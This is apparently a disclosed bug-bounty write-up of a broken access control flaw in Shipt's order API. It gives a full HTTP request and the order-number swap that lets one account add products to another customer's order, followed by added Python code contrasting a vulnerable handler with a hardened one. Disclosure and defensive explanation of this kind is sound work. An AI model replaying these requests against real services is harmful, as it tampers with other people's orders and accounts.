Broken access control: tampering with a user's order to add products they never bought


1. Register two accounts and place an order from each without paying, which yields two order numbers: 1813918441 and 181396149.

POST /aviator/v2/orders/1813918441/add.json?anonymous_id=deac090c-2b05-4402-b33f-468060058145&white_label_key=shipt&segway_version=6668a3d631495cebf307423e23a588c5f9d929c1&zip=19147&user_id=48645513&metro_id=124&store_id=60&bucket_number=72&store_location_id=13204&platform=web HTTP/2
Host: api.shipt.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 154
Referer: https://www.shipt.com/
Origin: https://www.shipt.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
X-Pwnfox-Color: blue
Authorization: Bearer [YOUR TOKEN HERE]
Te: trailers

{"zip":"19147","user_id":48645513,"metro_id":124,"store_id":60,"bucket_number":72,"store_location_id":13204,"products":[{"id":4799771,"qty":1,"note":""}]}

2. Replace order 1813918441 in the request path with the other account's order 181396149; the request succeeds and the products of that order are modified.

/aviator/v2/orders/1813918441/add.json

=>

/aviator/v2/orders/181396149/add.json
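The following is an added example, not code from the post or from Shipt, that models why the order-number swap in step 2 works and what a correct add.json handler has to check. The order numbers and user_id 48645513 are those shown in the request above; the owner id 99999999 for order 181396149, the in-memory store and the handler names are constructed placeholders. The point a defender should take from the report is that the user_id in the query string and body is attacker-controlled: authorization must be derived from the validated bearer token and the order lookup scoped to that identity.

```python
# Added example (not Shipt's code): minimal vulnerable vs. hardened add.json handler.
from dataclasses import dataclass, field


@dataclass
class Order:
    order_id: int
    owner_user_id: int
    products: list = field(default_factory=list)


def make_orders():
    """Fresh in-memory order store: one unpaid order per test account, as in step 1."""
    return {
        1813918441: Order(1813918441, 48645513),
        181396149: Order(181396149, 99999999),  # second account; owner id is constructed
    }


def add_products_vulnerable(orders, order_id, body):
    """Mirrors the flaw: the order is fetched purely by the ID in the URL path, and the
    user_id carried in the query string / body is never compared with the caller's
    identity, so any authenticated user can write into any order."""
    order = orders.get(order_id)
    if order is None:
        return 404, None
    order.products.extend(body["products"])
    return 200, order


def add_products_secure(orders, auth_user_id, order_id, body):
    """Hardened handler. auth_user_id must come from the validated bearer token, never
    from the request parameters; the lookup is then scoped to that user's own orders."""
    order = orders.get(order_id)
    # Same response for "does not exist" and "belongs to someone else", so the
    # endpoint does not confirm which order numbers exist.
    if order is None or order.owner_user_id != auth_user_id:
        return 404, None
    # A body naming a different user_id is a tampering signal worth logging;
    # reject it rather than silently overriding it.
    if body.get("user_id") not in (None, auth_user_id):
        return 403, None
    order.products.extend(body["products"])
    return 200, order


def replay_report():
    """Replays step 2 against both handlers: user 48645513 sends its own body but puts
    the other account's order number in the path."""
    body = {"user_id": 48645513, "products": [{"id": 4799771, "qty": 1, "note": ""}]}
    vuln = make_orders()
    v_status, _ = add_products_vulnerable(vuln, 181396149, body)
    safe = make_orders()
    s_status, _ = add_products_secure(safe, 48645513, 181396149, body)
    return {
        "vulnerable_status": v_status,
        "victim_products_after_vulnerable": len(vuln[181396149].products),
        "secure_status": s_status,
        "victim_products_after_secure": len(safe[181396149].products),
    }


if __name__ == "__main__":
    # Expected: vulnerable handler returns 200 and the victim's order gains a product;
    # hardened handler returns 404 and the victim's order is untouched.
    print(replay_report())
```

Returning 404 for both "missing" and "not yours" is a deliberate choice: a 403 on a foreign order tells a probing client that the order number is valid. The 403 branch is reserved for the case where the caller's own order is addressed but the body claims a different user, which is never a legitimate client behaviour and is a useful detection signal.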

Reference:

https://hackerone.com/reports/1903322
